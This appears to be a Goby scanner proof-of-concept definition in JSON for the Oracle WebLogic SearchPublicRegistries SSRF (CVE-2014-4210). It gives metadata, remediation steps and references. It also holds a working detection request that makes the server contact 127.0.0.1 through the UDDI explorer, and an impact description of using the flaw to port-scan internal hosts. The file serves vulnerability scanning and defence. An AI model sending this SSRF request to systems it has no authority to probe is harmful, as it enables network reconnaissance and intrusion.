mirror of https://github.com/qwqdanchun/Goby.git
71 lines
3.5 KiB
JSON
71 lines
3.5 KiB
JSON
{
|
||
"Name": "WebLogic SearchPublicRegistries SSRF(CVE-2014-4210)",
|
||
"Description": "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.",
|
||
"Product": "WebLogic",
|
||
"Homepage": "http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html",
|
||
"DisclosureDate": "2013-12-01",
|
||
"Author": "Mrcat",
|
||
"FofaQuery": "app=\"BEA-WebLogic-Server\"",
|
||
"GobyQuery": "",
|
||
"Level": "2",
|
||
"Impact": "It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.\u003c/br\u003eSSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).",
|
||
"Recommendation": "\u003cp style=\"text-align: start;\"\u003e1.如果业务不需要UDDI功能,就关闭这个功能。可以删除uddiexporer文件夹,可以可在/weblogicPath/server/lib/uddiexplorer.war解压后,注释掉上面的jsp再打包。\u003c/p\u003e\u003cp style=\"text-align: start;\"\u003e2.安装oracle的更新包。\u003ca target=\"_blank\" href=\"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\"\u003ehttp://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\u003c/a\u003e\u003c/p\u003e",
|
||
"References": [
|
||
"https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html",
|
||
"https://nvd.nist.gov/vuln/detail/CVE-2014-4210",
|
||
"https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf",
|
||
"http://seclists.org/fulldisclosure/2014/Dec/23",
|
||
"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html",
|
||
"http://www.securityfocus.com/archive/1/534161/100/0/threaded",
|
||
"http://www.securityfocus.com/bid/68629",
|
||
"http://www.vmware.com/security/advisories/VMSA-2014-0012.html",
|
||
"https://exchange.xforce.ibmcloud.com/vulnerabilities/94554",
|
||
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4210"
|
||
],
|
||
"HasExp": false,
|
||
"ExpParams": [],
|
||
"ExpTips": {
|
||
"Type": "Tips",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"data": "",
|
||
"data_type": "text",
|
||
"header": {},
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1\u0026rdoSearch=name\u0026txtSearchname=sdf\u0026txtSearchkey=\u0026txtSearchfor=\u0026selfor=Business+location\u0026btnSubmit=Search"
|
||
},
|
||
"ResponseTest": {
|
||
"checks": [
|
||
{
|
||
"bz": "",
|
||
"operation": "contains",
|
||
"type": "item",
|
||
"value": "weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused",
|
||
"variable": "$body"
|
||
},
|
||
{
|
||
"bz": "",
|
||
"operation": "contains",
|
||
"type": "item",
|
||
"value": "Received a response from url",
|
||
"variable": "$body"
|
||
}
|
||
],
|
||
"operation": "OR",
|
||
"type": "group"
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"Tags": [
|
||
"ssrf"
|
||
],
|
||
"CVEIDs": [
|
||
"CVE-2014-4210"
|
||
],
|
||
"CVSSScore": "5.0"
|
||
} |